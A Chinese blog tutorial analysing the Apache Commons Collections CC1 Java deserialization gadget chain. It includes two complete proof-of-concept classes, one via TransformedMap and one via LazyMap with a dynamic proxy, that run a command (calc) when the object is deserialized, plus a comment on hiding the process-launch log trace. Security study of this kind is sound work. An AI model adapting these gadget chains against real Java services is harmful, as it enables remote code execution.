CC1链分析与复现

最新推荐文章于 2024-06-05 09:29:57 发布
最新推荐文章于 2024-06-05 09:29:57 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: Java安全 文章标签: java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42974824/article/details/126374562
版权

背景介绍

Apache Commons Collections 是对 java.util.Collection 的扩展。对集合类进行了增强和改进。集合类一般作为传递的载体和包裹

SUN包在IDEA下配置调试

https://www.javatt.com/p/60827

入口点

Transformer接口
在这里插入图片描述
实现Transform接口的方法
在这里插入图片描述
需要利用的三个类:
ConstantTransformer类:接收一个对象,返回一个常量,这个常量是在构造方法里设置的。不管传什么都返回构造方法的常量。
ChainedTransformer类:构造方法里要传一个Transformer的数组,然后将数组循环,链式调用,前一个的输出作为后一个输入循环调用。
InvokerTransformer类:构造函数接收方法名、参数类型、参数值,然后transform方法接收一个对象,反射执行该对象的方法。很标准的任意方法调用类。例如:new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(Runtime._getRuntime_());

通过Transformer序列化Runtime

Runtime不能序列化,因为Runtime类是没有实现serialaze接口的。但是Class是可以序列化的。那么就从Class入手。
在这里插入图片描述

Transformer[] transformers = new Transformer[]{ //Transformer的数组
    new ConstantTransformer(Runtime.class),//ConstantTransformer的transform的方法会返回构造方法内的对象,这里返回的是Runtime的Class
    new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),//getRuntime方法会返回一个Runtime实例(单例模式)。
    new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),//getRuntime方法是静态方法所以第一个参数是null,getRuntime方法没有参数因此第二个参数也是null
    new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})//执行方法
    };

//这里因为第一个Transform是ConstantTransformer,它的transform方法不论接收什么参数,都会返回构造方法的对象,因此这里传入一个字符串空值。
        new ChainedTransformer(transformers).transform("");//ChainedTransformer构造方法接收一个Transform数组,然后它的transform方法会遍历执行数组内的transform方法,将上一个Transform的结果传递给下一个Transform

调用链寻找

了解到InvokerTransformer可以进行方法调用,那么就去搜索哪个类中调用了transformer方法。最后搜到TransformedMap是一个好的利用点,其实ysoserial中使用了LazyMap,而且是使用动态代理的方式。TransformedMap与LazyMap的区别是TransformedMap是在写入元素的时候执行transformed,而LazyMap是在get方法中执行factory.transform。LazyMap的作用是“懒加载”,在get找不到值的时候,它会调用 factory.transform 方法去获取一个值在这里插入图片描述

TransformedMap的checkSetValue方法调用了transform
在这里插入图片描述
checkSetValue又在MapEntry的setValue方法中调用。
这里注意AbstractMapEntryDecorator抽象类是TransformedMap和MapEntry的父类。
在这里插入图片描述
MapEntry是Map遍历的时候一个键值对就叫一个Entry。正常想的话,我们只需要去遍历被TransformedMap修饰过的Map并且执行setValue方法,那么就会调用TransformedMap的checkSetValue方法。
在这里插入图片描述
因为是执行value的Transformer,因此value得是Runtime类。这样InvokerTransformer会获取value的class就是Runtime。到这一步的示例代码:
在这里插入图片描述

到现在,我们只需要去找谁能够执行Entry的setValue方法,最好是谁的readObject里面调用了setValue,因为反序列化入口都为readObject。找到一个这样的类,那么我们就可以进行命令执行。

AnnotationInvocationHandler类使用TransformedMap方式实现利用链

使用TransformedMaps是因为在AnnotationInvocationHandler类的readObject方法中调用了setValue,但是是在低版本的JDK中才有,我这是8u51版本,在8u321版本中这块代码进行了修改(从8u71开始做的修改),新增了LinkedHashMap来替代我们反序列化得到的Map对象,并且没有了setValue方法。
在这里插入图片描述

完整代码示例:
在这里插入图片描述

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class CC1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{ //Transformer的数组
            new ConstantTransformer(Runtime.class),//ConstantTransformer的transform的方法会返回构造方法内的对象,这里返回的是Runtime的Class
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),//getRuntime方法会返回一个Runtime实例(单例模式)。
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),//getRuntime方法是静态方法所以第一个参数是null,getRuntime方法没有参数因此第二个参数也是null
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})//执行方法
            };
        
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);//ChainedTransformer构造方法接收一个Transform数组,然后它的transform方法会遍历执行数组内的transform方法,将上一个Transform的结果传递给下一个Transform
        
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value", "a");//为了AnnotationInvocationHandler的逻辑判断,key为value和构造方法里的Target.class的value属性一致才可以
        
        Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
        
        //JDK内部的类,不能直接使用new来实例化。我使用反射获取到了它的构造方法,并将其设置成外部可见的,再调用就可以实例化
        Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> aClassDeclaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
        aClassDeclaredConstructor.setAccessible(true);
        Object o = aClassDeclaredConstructor.newInstance(Target.class, decorate);//使用Target是因为它有value属性,AnnotationInvocationHandler里面进行了if判断,只有map的key和value一致时才触发
        
        serialize(o);
        unSerialize();
    }
    
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D://ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    
    public static Object unSerialize() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D://ser.bin"));
        return objectInputStream.readObject();
    }
}

AnnotationInvocationHandler类使用LazyMap方式实现利用链

ysoserial(y so serial)使用的是这种方式。LazyMap和TransformedMap类似,都来自于Common-Collections库,并继承AbstractMapDecorator。LazyMap仍然无法解决CommonCollections1这条利用链在高版本Java(8u71以后)中的使用问题

LazyMap的漏洞触发点和TransformedMap唯一的差别是,TransformedMap是在写入元素的时候执行transform,而LazyMap是在其get方法中执行的factory.transform。LazyMap的作用是”懒加载“,在get找不到值的时候,它会调用factory.transform方法去获取一个值。

但是相比于TransformedMap的利用方法,LazyMap后续利用稍微复杂一些,原因是在sun.reflect.annotation.AnnotationInvocationHandlerreadObject方法中并没有直接调用到Map的get方法。所以ysoserial找到了另一条路,AnnotationInvocationHandler类的invoke方法有调用到get

调用AnnotationInvocationHandler的invoke方法,ysoserial使用的是动态代理。
完整代码示例:
在这里插入图片描述

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class CC1LazyMap {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{ //Transformer的数组
            new ConstantTransformer(Runtime.class),//ConstantTransformer的transform的方法会返回构造方法内的对象,这里返回的是Runtime的Class
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),//getRuntime方法会返回一个Runtime实例(单例模式)。
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),//getRuntime方法是静态方法所以第一个参数是null,getRuntime方法没有参数因此第二个参数也是null
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),//执行方法
            new ConstantTransformer(1)//隐蔽了启动进程的日志特征
            };
        
        Transformer chainedTransformer = new ChainedTransformer(transformers);//ChainedTransformer构造方法接收一个Transform数组,然后它的transform方法会遍历执行数组内的transform方法,将上一个Transform的结果传递给下一个Transform
        
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> decorate = LazyMap.decorate(map, chainedTransformer);
        
        //JDK内部的类,不能直接使用new来实例化。我使用反射获取到了它的构造方法,并将其设置成外部可见的,再调用就可以实例化
        Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> construct = aClass.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, decorate);//使用Target是因为它有value属性,AnnotationInvocationHandler里面进行了if判断,只有map的key和value一致时才触发
        
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
        handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);//代理后的对象叫做proxyMap,但我们不能直接对其进行序列化,因为我们入口点是AnnotationInvocationHandler#readObject,所以我们还需要再用AnnotationInvocationHandler对这个proxyMap进行包裹
        
        serialize(handler);
        unSerialize();
    }
    
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D://ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    
    public static Object unSerialize() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D://ser.bin"));
        return objectInputStream.readObject();
    }
}

LazyMap和TrasnformedMap利用上的区别

  • LazyMap和TransformedMap类似,都来自于Common-Collections库,并继承AbstractMapDecorator。
  • LazyMap和TransformedMap都无法解决CommonCollections1这条利用链在高版本Java(8u71以后)中的使用问题
  • LazyMap的漏洞触发在get和invoke中,TransformedMap的触发在Entry.setValue方法。
杜子腾1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jdk1.8.60,CC1复现
11-29
1)bin:包含了最主要的是编译器(javac.exe)2)include:Java 和 JVM 交互用的头文件3)lib:类库4)jre:Java 运行环境JDK 有三种类型。1)J2SE:Standard Edition,标准版,是我们通常用的一个版本,从 JDK 5.0 ...
一文带你搞懂CC1(小白入门必看文章)
maple_leaf
12-03 2165
CC是利用Java反序列化漏洞进行攻击的一种方式。CC利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
CC1链分析
sunyufei_666的博客
06-15 252
第一个是memberType类型不为空值,这里type是传入的Override.class,annotationType.memberTypes()为调用出入class的成员方法,所以,传入的class类中必须存在成员方法,且成员变量的key值必须与map中的key值相同,而Override.class的成员方法为空值,所以这里可以选择Target.class作为参数。这里有两个if,如果这两个if的条件为false时,无法调用里面的setValue方法。
Java反序列化-cc1挖掘复现(个人学习笔记)
最新发布
Rsecret的博客
06-05 792
Java反序列化-cc1挖掘复现(个人学习笔记)
java代码审计之CC1(一)
st3pby的博客
02-20 3778
InvokerTransformerCC1的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
cc1学习
lightsec
04-24 1960
前言: 本文主要记录学习cc1的过程,cc1是第一条也是最经典的一条利用,后面几条利用也是基本多多少少利用了这条子,刚接触javacc,过程中有错误理解不对的地方,欢迎师傅们指正 分析过程: 先简单提一下利用是怎么形成的,也便我们好寻找 org.apache.commons.collections.functors Commons Collections 自定义的一组功能类 这组功能类里面有个 ConstantTransformer.java 是一个转换器,里面定义了一个 trans
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
shap分析mnist实验复现1.rar
11-30
标题中的"shap分析mnist实验复现1.rar"指的是一个关于使用SHAP(SHapley Additive exPlanations)方法来解释PyTorch模型预测的实验,该实验基于经典的MNIST手写数字识别数据集。这个压缩包包含了实现这一分析的代码...
numpy复现马尔科夫算法内含数据集
10-16
1. **状态与转移概率**:马尔科夫由一系列状态组成,每个状态可以转移到其他状态。关键特征是“无后效性”,即当前状态只依赖于前一个状态,而不依赖于更早的状态。状态之间的转移概率是固定的。 2. **状态空间**...
Java安全学习笔记--反序列化利用CC1(1)
m0_64685672的博客
01-16 1046
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 反射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
Java反序列化:CC1 详解
Jay17的博客
10-06 1056
Java反序列化:CC1 详解
CC1利用EXP编写之源码分析
yuan_boss的博客
08-14 212
经过查找,可以发现类的setValue()方法中调用了checkSetValue()方法,并且setValue()方法可以传入任意参数类型。
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1170
我们看一下两条子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
CC1(TransformMap版)
..
10-09 809
借用闪烁之狐的介绍是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
commons-collections1(cc1)反序列化链分析
遇事不决冲冲冲
01-30 5109
commons-collections1也就是常说的cc1,网上一般有两条子,一个就是ysoserial中的lazymap,还有transformedmap,刚开始碰到cc1子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
JavaSec 基础之 CC1
akdelt的博客
03-11 430
调用了 checkSetValue。而且它是 TransformedMap 的父类。
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4070
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值